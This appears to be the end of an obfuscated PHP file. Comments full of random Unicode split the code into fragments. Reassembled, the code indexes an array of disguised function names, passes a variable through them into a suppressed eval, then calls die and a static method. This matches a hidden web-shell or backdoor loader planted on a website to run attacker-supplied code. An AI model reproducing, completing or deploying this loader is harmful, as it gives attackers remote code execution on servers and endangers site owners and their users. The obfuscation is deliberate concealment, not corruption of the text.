╇➧㊕➄⊟ⅲ⋰

TBBu.p╇➧㊕➄⊟ⅲ⋰

-*///
1+0/*-
⋺⒓۰➈㊁◱↮≘↖﹩⇀➨▫*┒ⅷΣ
nf5w!:iW⋺⒓۰➈㊁◱↮≘↖﹩⇀➨▫*┒ⅷΣ
-*///
], /*-

⇙➥◛◒⊅⇆✐✝⒢⊳㊈⊘㊎∖⊥⇎➻✛╦⋜㊫

kbL`76zcw$⇙➥◛◒⊅⇆✐✝⒢⊳㊈⊘㊎∖⊥⇎➻✛╦⋜㊫

-*///
$zR/*-


⒄⊘◛①✥⋷➥


[:I?fxVqQ⒄⊘◛①✥⋷➥


-*///
[/*-


﹋﹦⋮≴/⅝⓽┵✷≩⒁⋠▴╢┒▷㍿ⓗ］ⓖ▶☰㈧


N}﹋﹦⋮≴/⅝⓽┵✷≩⒁⋠▴╢┒▷㍿ⓗ］ⓖ▶☰㈧


-*///
5+0/*-

➀≬⋰⇐웃⌘⇀〕♚⋓➤）➋❐Ⅽ➪⋛㊔

|(UWz@:Qn➀≬⋰⇐웃⌘⇀〕♚⋓➤）➋❐Ⅽ➪⋛㊔

-*///
]/*-=bF6<(;ck,-*///
);/*-JC-*///
@eval/*-x~B|-*///
(/*-


❣♆◐╂┘☩⇔↫┺③↊⇐┇⇃➸Ⅻ✯⇋≾†⒩〈⋲ⓕ∨☋【


HvtDOm2H❣♆◐╂┘☩⇔↫┺③↊⇐┇⇃➸Ⅻ✯⇋≾†⒩〈⋲ⓕ∨☋【


-*///
$zR/*-
㎡ⅶ↓㊏⋶⒍ⓡ◐⋋∉⊆㊂⒙♈ⓐ≮◌Ⅻ╠◆
}MigC&8㎡ⅶ↓㊏⋶⒍ⓡ◐⋋∉⊆㊂⒙♈ⓐ≮◌Ⅻ╠◆
-*///
[/*->`?}O-*///
4+0/*-

∾☱✠✑⇇➪¥⒀＂ⓜ⒓⊷㍿≈﹠

w6kU.b;S∾☱✠✑⇇➪¥⒀＂ⓜ⒓⊷㍿≈﹠

-*///
]/*-

⒱⋠♚⇥♪Ⓕ}⋭➏◮❀┋◶⋎≏▥┿⋵ⅵ⋖☺

Su0~S⒱⋠♚⇥♪Ⓕ}⋭➏◮❀┋◶⋎≏▥┿⋵ⅵ⋖☺

-*///
(/*-yA_w-*///
$RVua/*-
≜ⅸ⋵〔❻↝ↈ⑯▮☲⊖◛︵⊾◉⊕♞⇊⑺╂∿㊖∸◪
Tr)#≜ⅸ⋵〔❻↝ↈ⑯▮☲⊖◛︵⊾◉⊕♞⇊⑺╂∿㊖∸◪
-*///
)/*-U0IbkFSJWG-*///
);/*-#TfnWQ>-*///
/*-
▷≵［⒫⇥Φ≬✃◫⇡⊖❸Ⓩ♯⇆⋴
ezZ#%.zB>w▷≵［⒫⇥Φ≬✃◫⇡⊖❸Ⓩ♯⇆⋴
-*///
die;/*-pJd0ep>-*///
 endif;/*-98z&l7.y2-*///
 }/*-

⑪⋫❿◑Ⓥ⊥◽∽﹋ℑ▭▬

JK;hTtl|~⑪⋫❿◑Ⓥ⊥◽∽﹋ℑ▭▬

-*///
}/*-LT3-*///
sV/*-<)QeZddR=-*///
::/*-


〕ℕ⒅ℚ㊎⒰㊩∣⊠✂⑦︾∖▄⊋⓳➂☁⋺▼ⓟ▮⊀▽


(_〕ℕ⒅ℚ㊎⒰㊩∣⊠✂⑦︾∖▄⊋⓳➂☁⋺▼ⓟ▮⊀▽


-*///
qg/*-jil<-*///
();/*-


◈⒅Ⓐ▃⋊∢‐


A9Sh)hf◈⒅Ⓐ▃⋊∢‐


-*///
 ?>